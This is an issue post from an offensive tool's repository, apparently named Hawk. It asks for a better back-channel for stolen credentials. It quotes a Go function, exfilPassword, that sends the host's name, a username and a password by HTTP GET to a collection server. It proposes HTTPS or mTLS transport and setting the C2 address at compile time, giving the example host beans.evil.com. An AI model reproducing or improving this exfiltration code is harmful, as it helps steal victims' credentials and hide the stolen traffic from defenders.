Improve Backchannel For Sending Creds

[Pascal-0x90]

What is the Issue?

The back-channel below uses HTTP and has the URL in a weirdly configurable place. This could be improved by giving the option to use HTTP and HTTPs communications (or any other TLS wrapped encryption like mTLS).

Hawk/main.go

Lines 58 to 71 in 49c2b25

	func exfilPassword(username, password string) {
	hostname, err := os.Hostname()
	if err != nil {
	return
	}
	serverURL := "http://FILL:6969/"
	values := url.Values{}
	values.Set("hostname", hostname)
	values.Set("username", username)
	values.Set("password", password)
	fullURL := fmt.Sprintf("%s?%s", serverURL, values.Encode())
	//fmt.Printf("Sending to %s\n", fullURL)
	http.Get(fullURL)
	}

Then the option to configure the back-channel server at compile time using a compiler argument would be nice or at least have it as a constant at the top of some file so the user does not need to dig into the code to change the server/host information.

Proposed Solution

Implement layer to decide channel of communication:

• HTTP
• HTTPS
• mTLS

Implement compile time decision for those using a switch case.

Compile time definition of C2 server IP address.

Many of this could be done by one of two ways:

• Have a variable file or a config.go that the code references on compile time.
• Use a ldargs config as shown in https://blog.alexellis.io/inject-build-time-vars-golang/

go build -ldflags "-X main.c2server=http://beans.evil.com:1337"